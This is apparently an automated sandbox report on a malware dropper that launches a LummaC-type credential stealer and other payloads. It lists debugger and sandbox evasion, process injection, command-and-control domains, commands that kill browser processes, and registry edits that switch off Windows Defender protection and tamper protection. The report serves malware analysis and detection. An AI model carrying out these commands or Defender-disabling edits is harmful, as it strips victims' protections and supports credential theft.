Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2174108955.000000000108F000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmp, 1c8dd6ecf9.exe, 00000008.00000002.3052757213.000000000082B000.00000040.00000001.01000000.00000009.sdmp, 6523f73121.exe, 00000009.00000002.3662876837.00000000009AC000.00000040.00000001.01000000.0000000A.sdmp, 1c8dd6ecf9.exe, 0000000A.00000002.3182062415.000000000082B000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3646506394.0000000005926000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

System information queried: KernelDebuggerInformation

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04CD01A1 rdtsc

0_2_04CD01A1

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Code function: 9_2_6D5A5FF0 IsDebuggerPresent,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

9_2_6D5A5FF0

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

9_2_6D5A55F0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED652B mov eax, dword ptr fs:[00000030h]	0_2_00ED652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EDA302 mov eax, dword ptr fs:[00000030h]	0_2_00EDA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0015A302 mov eax, dword ptr fs:[00000030h]	2_2_0015A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0015652B mov eax, dword ptr fs:[00000030h]	2_2_0015652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0015A302 mov eax, dword ptr fs:[00000030h]	3_2_0015A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0015652B mov eax, dword ptr fs:[00000030h]	3_2_0015652B

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	9_2_61EAF900
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D57B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_6D57B66C
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D57B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_6D57B1F7

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 6523f73121.exe PID: 4132, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe

Memory written: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: 1c8dd6ecf9.exe	String found in binary or memory: rapeflowwj.lat
Source: 1c8dd6ecf9.exe	String found in binary or memory: crosshuaht.lat
Source: 1c8dd6ecf9.exe	String found in binary or memory: sustainskelet.lat
Source: 1c8dd6ecf9.exe	String found in binary or memory: aspecteirs.lat
Source: 1c8dd6ecf9.exe	String found in binary or memory: energyaffai.lat
Source: 1c8dd6ecf9.exe	String found in binary or memory: necklacebudi.lat
Source: 1c8dd6ecf9.exe	String found in binary or memory: discokeyus.lat
Source: 1c8dd6ecf9.exe	String found in binary or memory: grannyejh.lat
Source: 1c8dd6ecf9.exe	String found in binary or memory: sweepyribs.lat

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe "C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe "C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe "C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe "C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe "C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: dfa5c95181.exe, 0000000B.00000000.3064747252.0000000000CB2000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exe, file.exe, 00000000.00000002.2174335919.00000000010D6000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager
Source: 6523f73121.exe, 6523f73121.exe, 00000009.00000002.3664855453.00000000009F5000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: !Program Manager
Source: firefox.exe, 0000001C.00000002.3321695900.000000E2111FB000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?ProgmanListenerWi
Source: 1c8dd6ecf9.exe, 1c8dd6ecf9.exe, 00000008.00000002.3052757213.000000000082B000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: L#-Program Manager

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017483001\6275af3e11.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017483001\6275af3e11.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017484001\33004eec70.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017484001\33004eec70.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017485001\7541c3520d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017485001\7541c3520d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017486001\a86d92bee8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017486001\a86d92bee8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017487001\8452c0edd3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017487001\8452c0edd3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EBCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_00EBCBEA

Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
